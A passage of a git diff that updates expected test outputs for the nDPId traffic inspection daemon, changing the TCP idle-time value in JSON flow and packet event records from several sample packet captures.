{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"}} 00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -675,8 +675,8 @@ 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}} -00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382858,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104404055,"flow_last_seen":1470104418595,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} diff --git a/test/results/443-chrome.pcap.out b/test/results/443-chrome.pcap.out index d9095a931..0707d9454 100644 --- a/test/results/443-chrome.pcap.out +++ b/test/results/443-chrome.pcap.out @@ -1,9 +1,9 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-chrome.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581109434258} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1581109434258,"pkt":"KDc3AG3IEBMx8Tl2CABFAAXUL9xAADQG19GyPsWCwKgBDQG7z0OMwKr+Oj0RjoAQAfVXrQAAAQEICiUvy0seKwePAbBkhQkGDSwXAwMFJB7ULkZYT314CXk9r8PlYJygP344H6B+ItT1QydBOUTT\/6D31GPVzKtOQjSVxhbT8njy8fnLCF03csGz4\/Y1RkgUVmI84ERVBP7zbdzqFVMxHmkRU4146\/GYpGt09JudxRaBFBE6RH99GaIPOIBgIxL+lVzyEaqTle8b2ooKlmYXANwIghY6MzW7vfR0m2NAd4\/mImO8\/LyUCeGK0r\/puyNRW7lwQQMAmHKJdbXl9VyEWyHoVGg2V7UztPOOS9FaOf7PI0qXcHmQjpNhC3tUdKXBoA5lr9L4gV9TtzI0jsGqvB9N6GFz+qcMvQNu9oMflyIYBhNXeC+wMS3iHkbmb6YjZ1BITgZEep9Fizk45i3xCMymSmOsda0ujEX4jtgvxVvAdOobavQSODmvW7nF0r5t9e88tMuzTz7+vTqoOaJn4Q5qSGioRtcVHnLq2LNPOuGgbZaLvf8nOa3F\/fTzsfVgOnrof2PK7x6zJRR4iLtFUyiyV0abVTIHELfIYnSCf71pFYSlMWF1kbosbMAxw+8gDHb28maLs7wPXvpNMwUQmC5zWPLwG8e+Pf\/3nur0wrn5EOul2L1tr2PBCGM7nQJnzz+Ftab4qAnCKKMUrufRAVhXA6Ue6CMSRLYliOxzGRgmHVxorbbpx87m7XMCx1xGrv\/+sMpgjOYFPN80vjeb9Ar4xkocVQgWuuKpaWdNDznMzFzG0+H1ekKy8mE\/Y4uj8aty0rTxx\/RK0gYF2CUtsmGNskEzCWUbq5MAqcp05SHkAJHGGJeLVJYaWPvGXbFa5QHn9poomy6DBa+Zu\/J+olJwYCoT+frN77wk+XmgZEGX8LeovmjP4s1R+UbEFUsUMksh6m15XB\/oDSc43HBC0ZN2fBl+EVSpfPjbG\/eOyIfLCt5fbBfnhNgvommX5LE+2Hk1er+ly1V3Bk3SksoPHjYC3atFWwOW8i0ksy3cnSr3r7urFNldk3MU3+jnEXfTimw+aCW1vRMowhmfm8PlgjcufRfy+KbXvWvcglQ5SIZzkHbMTgRIVTH0rnzAvQa5V3qwPK10Uoz7qDIouhn\/mb\/ZISHF6mBR\/IXvmgdDxCQjDF0pzdpHGlijQnscX9IYmuALydf\/N95pDI1Ksot3SwlV+ToeoAcOu03ffeX9ZWtpGReoSSLBreVK2S9eOKb7ts0O5zIIo7KsqQiv\/vBgScz8WXOWpxQ\/yJVR5ay52w6EYcainLIU7Xbc\/tjzrhulig3U\/8LJroIUx7FTN+1M\/XXQgxU1xPwXfZVd2BCyLjPf3LnCxXwnRvsKpAN+jMhuodhLSF7CgHqc20YiiLhRoKoX9HTNFjjp4NCVuyybqoR14grCEsHZOU2qhA+8BZe5VlL7unSunUXcr1PeN9gM5Jq4MVqPdpyzDhvJpSxU3Hx+L1u56H6J0VrRo\/R6fO225uB9ZADFU\/E9+rLvS3XjVihQI4Xj3oV8Yz2DHOUB7myCSIfri88nrYevcoAQbwAgIH3ZuvMVV+F7spgWZOgjijLQs9AFYfhIg77XK7GhiJW4kT1GNIqN\/59u+gIdPmDuGurVucPbruilLRCDIsr+53Us+irmCwo\/E2YPbk4a0f3NX0k+rNo92g1D9wTfG3QFRXLoBVDcr2q9BeW0PVJsavNUQM+jFbQkjfp93AvyPnmEBcWXIT002jYiClr1Y1\/emkCZ90t5YN1lLX5fUvWWgwvQ8NqFZ2zWMZciPkbKDA3g3Y+AskVzW3FFBLqR77\/aXs+9FwMDBSQUQnjU3ptBoEOyx5s5g6C1C+gxkfWLgzLDV66R77tBk395nAfOwKbaxf02lWN9Kl7ER9qk1HP5doNJPo83hbomHGy3aIU4qtqfnGI\/DWje6wuZoh6zDMTlo3NI6IL\/slMBsWm6kBIHkYOp"} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1581109434258,"pkt":"KDc3AG3IEBMx8Tl2CABFAAXUL9xAADQG19GyPsWCwKgBDQG7z0OMwKr+Oj0RjoAQAfVXrQAAAQEICiUvy0seKwePAbBkhQkGDSwXAwMFJB7ULkZYT314CXk9r8PlYJygP344H6B+ItT1QydBOUTT\/6D31GPVzKtOQjSVxhbT8njy8fnLCF03csGz4\/Y1RkgUVmI84ERVBP7zbdzqFVMxHmkRU4146\/GYpGt09JudxRaBFBE6RH99GaIPOIBgIxL+lVzyEaqTle8b2ooKlmYXANwIghY6MzW7vfR0m2NAd4\/mImO8\/LyUCeGK0r\/puyNRW7lwQQMAmHKJdbXl9VyEWyHoVGg2V7UztPOOS9FaOf7PI0qXcHmQjpNhC3tUdKXBoA5lr9L4gV9TtzI0jsGqvB9N6GFz+qcMvQNu9oMflyIYBhNXeC+wMS3iHkbmb6YjZ1BITgZEep9Fizk45i3xCMymSmOsda0ujEX4jtgvxVvAdOobavQSODmvW7nF0r5t9e88tMuzTz7+vTqoOaJn4Q5qSGioRtcVHnLq2LNPOuGgbZaLvf8nOa3F\/fTzsfVgOnrof2PK7x6zJRR4iLtFUyiyV0abVTIHELfIYnSCf71pFYSlMWF1kbosbMAxw+8gDHb28maLs7wPXvpNMwUQmC5zWPLwG8e+Pf\/3nur0wrn5EOul2L1tr2PBCGM7nQJnzz+Ftab4qAnCKKMUrufRAVhXA6Ue6CMSRLYliOxzGRgmHVxorbbpx87m7XMCx1xGrv\/+sMpgjOYFPN80vjeb9Ar4xkocVQgWuuKpaWdNDznMzFzG0+H1ekKy8mE\/Y4uj8aty0rTxx\/RK0gYF2CUtsmGNskEzCWUbq5MAqcp05SHkAJHGGJeLVJYaWPvGXbFa5QHn9poomy6DBa+Zu\/J+olJwYCoT+frN77wk+XmgZEGX8LeovmjP4s1R+UbEFUsUMksh6m15XB\/oDSc43HBC0ZN2fBl+EVSpfPjbG\/eOyIfLCt5fbBfnhNgvommX5LE+2Hk1er+ly1V3Bk3SksoPHjYC3atFWwOW8i0ksy3cnSr3r7urFNldk3MU3+jnEXfTimw+aCW1vRMowhmfm8PlgjcufRfy+KbXvWvcglQ5SIZzkHbMTgRIVTH0rnzAvQa5V3qwPK10Uoz7qDIouhn\/mb\/ZISHF6mBR\/IXvmgdDxCQjDF0pzdpHGlijQnscX9IYmuALydf\/N95pDI1Ksot3SwlV+ToeoAcOu03ffeX9ZWtpGReoSSLBreVK2S9eOKb7ts0O5zIIo7KsqQiv\/vBgScz8WXOWpxQ\/yJVR5ay52w6EYcainLIU7Xbc\/tjzrhulig3U\/8LJroIUx7FTN+1M\/XXQgxU1xPwXfZVd2BCyLjPf3LnCxXwnRvsKpAN+jMhuodhLSF7CgHqc20YiiLhRoKoX9HTNFjjp4NCVuyybqoR14grCEsHZOU2qhA+8BZe5VlL7unSunUXcr1PeN9gM5Jq4MVqPdpyzDhvJpSxU3Hx+L1u56H6J0VrRo\/R6fO225uB9ZADFU\/E9+rLvS3XjVihQI4Xj3oV8Yz2DHOUB7myCSIfri88nrYevcoAQbwAgIH3ZuvMVV+F7spgWZOgjijLQs9AFYfhIg77XK7GhiJW4kT1GNIqN\/59u+gIdPmDuGurVucPbruilLRCDIsr+53Us+irmCwo\/E2YPbk4a0f3NX0k+rNo92g1D9wTfG3QFRXLoBVDcr2q9BeW0PVJsavNUQM+jFbQkjfp93AvyPnmEBcWXIT002jYiClr1Y1\/emkCZ90t5YN1lLX5fUvWWgwvQ8NqFZ2zWMZciPkbKDA3g3Y+AskVzW3FFBLqR77\/aXs+9FwMDBSQUQnjU3ptBoEOyx5s5g6C1C+gxkfWLgzLDV66R77tBk395nAfOwKbaxf02lWN9Kl7ER9qk1HP5doNJPo83hbomHGy3aIU4qtqfnGI\/DWje6wuZoh6zDMTlo3NI6IL\/slMBsWm6kBIHkYOp"} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":1440,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1581109434258} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 diff --git a/test/results/443-curl.pcap.out b/test/results/443-curl.pcap.out index e3a2e816e..0b97c350b 100644 --- a/test/results/443-curl.pcap.out +++ b/test/results/443-curl.pcap.out @@ -1,13 +1,13 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-curl.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581113120474} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113120474,"flow_last_seen":1581113120474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113120474,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113120474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113120474,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7FgtjjAbvMd3aVAAAAALAC\/\/97wQAAAgQFtAEDAwUBAQgKHmJFtwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113120512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113120512,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG72OOPktF9zHd2lqAS\/oj9JgAAAgQFrAQCCAolaAqTHmJFtwEDAwc="} 